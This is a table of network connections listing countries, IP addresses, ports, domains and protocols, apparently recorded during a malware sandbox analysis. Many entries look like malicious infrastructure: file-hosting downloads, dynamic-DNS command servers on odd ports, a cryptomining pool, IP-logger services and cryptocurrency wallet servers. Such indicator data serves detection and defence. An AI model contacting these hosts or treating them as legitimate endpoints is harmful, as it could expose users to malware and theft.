| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 235.70.216.185.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | vk.com | udp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| DE | 195.201.255.35:443 | tcp | |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:80 | vk.com | tcp |
| RU | 87.240.132.67:443 | vk.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 8.8.8.8:53 | 67.132.240.87.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.albertcolet.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.248.169.48:80 | www.saferspaces.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 100.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.check-data.xyz | udp |
| US | 8.8.8.8:53 | www.testupdate.info | udp |
| US | 44.236.198.167:443 | api.check-data.xyz | tcp |
| KZ | 185.22.66.224:80 | www.testupdate.info | tcp |
| KZ | 185.22.66.224:80 | www.testupdate.info | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | 16.43.107.13.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients16.google.com | udp |
| US | 8.8.8.8:53 | rfiles4.tracemonitors.com | udp |
| US | 8.8.8.8:53 | clients79.google.com | udp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles4.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 224.66.22.185.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | ogs.google.com | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| US | 44.236.198.167:443 | api.check-data.xyz | tcp |
| KZ | 185.22.66.224:80 | www.testupdate.info | tcp |
| US | 8.8.8.8:53 | api5.check-data.xyz | udp |
| KZ | 185.22.66.224:80 | www.testupdate.info | tcp |
| KZ | 185.22.66.224:80 | www.testupdate.info | tcp |
| US | 44.236.198.167:443 | api5.check-data.xyz | tcp |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| DE | 172.217.23.206:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| DE | 172.217.23.195:443 | ssl.gstatic.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 8.8.8.8:53 | server1.dumperstats.org | udp |
| US | 8.8.8.8:53 | 206.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients16.google.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | clients79.google.com | udp |
| BG | 185.82.216.111:443 | server1.dumperstats.org | tcp |
| FI | 64.233.164.127:19302 | stun1.l.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | walkinglate.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:443 | walkinglate.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 194.179.250.142.in-addr.arpa | udp |
| NL | 167.172.42.31:50001 | tcp | |
| US | 8.8.8.8:53 | electrum.hsmiths.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| SE | 45.154.252.104:50001 | electrum.hsmiths.com | tcp |
| US | 8.8.8.8:53 | 31.42.172.167.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| US | 8.8.8.8:53 | ex03.axalgo.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CZ | 37.205.9.165:50002 | tcp | |
| US | 8.8.8.8:53 | clients93.google.com | udp |
| US | 8.8.8.8:53 | rfiles2.tracemonitors.com | udp |
| US | 8.8.8.8:53 | rfiles3.tracemonitors.com | udp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 80.78.240.92:443 | rfiles3.tracemonitors.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| NL | 172.217.168.202:443 | content-autofill.googleapis.com | tcp |
| NL | 172.217.168.202:443 | content-autofill.googleapis.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 202.168.217.172.in-addr.arpa | udp |
| DE | 172.217.23.206:443 | apis.google.com | tcp |
| NL | 142.250.179.206:443 | ogs.google.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 172.217.23.195:443 | ssl.gstatic.com | tcp |
| US | 142.93.6.38:50001 | tcp | |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| US | 142.93.6.38:50001 | tcp | |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 38.6.93.142.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| SG | 139.59.232.148:50002 | tcp | |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 148.232.59.139.in-addr.arpa | udp |
| US | 188.114.97.0:80 | walkinglate.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients93.google.com | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | clients12.google.com | udp |
| US | 8.8.8.8:53 | api2.tracemonitors.com | udp |
| DE | 45.76.89.70:3333 | pool.hashvault.pro | tcp |
| US | 44.240.219.117:443 | api2.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.219.240.44.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 188.114.97.0:443 | yip.su | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.47:80 | 194.49.94.47 | tcp |
| US | 8.8.8.8:53 | gobo25cl.top | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 172.67.197.19:80 | gobo25cl.top | tcp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 8.8.8.8:53 | www.pdian.link | udp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| US | 172.67.197.19:443 | gobo25cl.top | tcp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 8.8.8.8:53 | rawcracker.com | udp |
| US | 172.67.180.173:443 | potatogoose.com | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 188.114.96.0:443 | rawcracker.com | tcp |
| BG | 91.92.243.139:80 | 91.92.243.139 | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| US | 8.8.8.8:53 | bobkelsofan.com | udp |
| US | 8.8.8.8:53 | check.graspalace.com | udp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 104.21.27.119:443 | bobkelsofan.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 188.114.96.0:80 | check.graspalace.com | tcp |
| US | 104.21.12.138:443 | iplogger.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 225.93.21.104.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | clients93.google.com | udp |
| US | 8.8.8.8:53 | clients12.google.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 133455789.xyz | udp |
| RU | 194.67.87.38:80 | 133455789.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | rfiles5.tracemonitors.com | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | desktop-netinstaller-sub.osp.opera.software | udp |
| US | 8.8.8.8:53 | autoupdate.geo.opera.com | udp |
| RU | 194.67.87.38:80 | 133455789.xyz | tcp |
| NL | 82.145.217.121:443 | desktop-netinstaller-sub.osp.opera.software | tcp |
| NL | 185.26.182.124:443 | autoupdate.geo.opera.com | tcp |
| RU | 194.67.87.38:80 | 133455789.xyz | tcp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:80 | rfiles5.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| RU | 80.78.240.92:443 | rfiles5.tracemonitors.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 124.182.26.185.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.mobdigim.com | udp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.250.179.163:443 | update.googleapis.com | udp |
| NL | 142.250.179.163:443 | update.googleapis.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients12.google.com | udp |
| DE | 195.201.255.35:443 | tcp | |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients93.google.com | udp |
| DE | 195.201.255.35:443 | tcp | |
| US | 8.8.8.8:53 | www.finebb.net | udp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| DE | 195.201.255.35:443 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 142.251.36.14:443 | play.google.com | udp |
| NL | 142.251.36.14:443 | play.google.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | www.yf168vip.com | udp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 173.231.16.77:80 | api.ipify.org | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.shortfall.net | udp |
| US | 13.248.169.48:80 | www.shortfall.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 91.92.254.7:80 | 91.92.254.7 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | tomwallner.icu | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 185.185.69.247:80 | tomwallner.icu | tcp |
| US | 8.8.8.8:53 | iplogger.com | udp |
| US | 104.21.12.138:443 | iplogger.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.tecverse.xyz | udp |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 185.185.69.247:80 | tomwallner.icu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.hreeremaeps.com | udp |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 192.229.221.25:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 34.120.175.65:80 | www.333vvs.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients12.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.3:443 | beacons.gcp.gvt2.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.xdeh02h.xyz | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 3.49.178.192.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | clients93.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.142:443 | google.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | www.shopbons-mall.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| US | 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | udp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.antsnav.com | udp |
| US | 104.21.79.64:80 | www.antsnav.com | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 64.79.21.104.in-addr.arpa | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.ssongg10834.cfd | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.rolexreloj.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 18.235.103.19:80 | www.rolexreloj.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 19.103.235.18.in-addr.arpa | udp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.prescribedaddiction.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 192.229.221.25:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 162.240.81.18:80 | www.irmaosconstrusilva.store | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | server16.realupdate.ru | udp |
| BG | 185.82.216.96:443 | server16.realupdate.ru | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 96.216.82.185.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 174.179.250.142.in-addr.arpa | udp |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | www.andersoonwindows.com | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| IT | 81.17.18.196:80 | www.andersoonwindows.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 196.18.17.81.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.zen-borabora.com | udp |
| IE | 52.212.52.84:80 | www.zen-borabora.com | tcp |
| US | 8.8.8.8:53 | 84.52.212.52.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
